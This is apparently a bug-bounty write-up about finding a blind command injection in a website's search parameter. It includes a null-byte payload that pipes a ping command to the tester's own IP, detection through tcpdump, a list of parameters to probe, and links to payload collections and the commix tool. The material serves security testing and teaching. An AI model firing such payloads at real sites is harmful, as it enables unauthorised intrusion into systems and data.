Blind Command Injection - It hurts
Summary :
Command Injection is a type of attack that executes arbitrary commands on the host operating system. Command injection happens when an application passes an unsafe user supplied data to a system shell. Command injection is possible due to insufficient input validation.
Generally it is tough to find command injection but luckily I found one few months ago. I noticed something weird with the GET parameter /?search= when I was testing for command injection. I tested so many payloads but nothing worked.
When I checked the response in burp suite it said “this object will store some %symbols% in the javascript space, so that libs can read them” so I thought it might be a blind command injection so I used tcpdump to find it out. Tcpdump comes pre-installed in kali linux.
How to find this vulnerability ?
- Go to your target website and check for some common parameters (in my case it was /?search=)
2. I tried injecting a payload by simply using a pipe operator but I didn’t get any response, it was a normal 200 OK
3. I used so many payloads for testing but only one worked which was a bypass using null byte character
4. I started tcpdump on kali because I knew that it was a blind command injection
You can use payloads from here : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
My custom payload that worked : http://www.mytarget.com/?search=%00{.exec|ping <MyIP>
You can also use wireshark instead of tcpdump for checking blind command injection
Though I found this command injection after a lot of efforts it was a duplicate of another report on a private program :( .
Some Common Parameters For Testing Command Injection :
/?query=
/?email=
/?id=
/?username=
/?user=
/?to=
/?from=
/?search=
/?query=
/?q=
/?s=
/?shopId=
/?blogId=
/?phone=
/?mode=
/?next=
/?firstname=
/?lastname=
/?locale=
/?cmd=
/?sys=
/?system=
There is a good tool on github for detecting command injection vulnerabilities automatically.
Link : https://github.com/commixproject/commix
Commix is an automated tool written by Anastasios Stasinopoulos that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.
Mitigation : To prevent Command Injections, never call out to OS commands from application-layer code.
